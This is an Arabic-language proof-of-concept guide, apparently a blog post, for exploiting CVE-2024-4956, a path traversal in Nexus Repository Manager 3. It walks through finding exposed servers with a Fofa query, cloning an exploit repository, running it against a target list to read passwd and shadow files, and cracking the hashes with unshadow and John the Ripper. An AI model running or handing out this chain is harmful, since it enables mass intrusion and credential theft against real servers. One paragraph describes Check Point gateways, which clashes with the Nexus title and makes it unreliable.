
POC - CVE-2024–4956 - Nexus Repository Manager 3 اجتياز المسار غير المُصادَق
قد تسمح للمهاجم بقراءة معلومات معينة على بوابات الأمان من Check Point عند الاتصال بالإنترنت وتفعيل Remote Access VPN أو Mobile Access Software Blades. يتوفر إصلاح أمني يخفف من هذه الثغرة.
اقرأ عنه — CVE-2024-4956
إخلاء مسؤولية: تم إنشاء إثبات المفهوم (POC) هذا لأغراض تعليمية واختبار أخلاقي فقط. استخدام هذه الأداة لمهاجمة الأهداف دون موافقة مسبقة متبادلة غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والاتحادية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
للعثور على أهداف محتملة، استخدم Fofa (مشابه لـ Shodan.io):
header="Server: Nexus/3.53.0-01 (OSS)"
أولاً، استنسخ المستودع:
git clone https://github.com/verylazytech/CVE-2024-4956
بعد ذلك اختر هدفك وأضفه إلى ملف list.txt بهذا التنسيق:
قم بتشغيل الاستغلال:
python3 CVE-2024-4956.py -l list.txt
الناتج هو ملفا passwd و shadow اللذان تم العثور عليهما:

الآن بعد العثور على ملفي passwd و shadow، يمكنك محاولة كسر الهاش باستخدام JohnTheRipper؛ بعد تشغيل الاستغلال يكون لديك ملفان، passwd و shadow، لذا يمكنك دمجهما في ملف واحد ومحاولة كسرهما (استخدمت rockyou.txt لكن يمكن أن تكون أي قائمة كلمات مرور):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt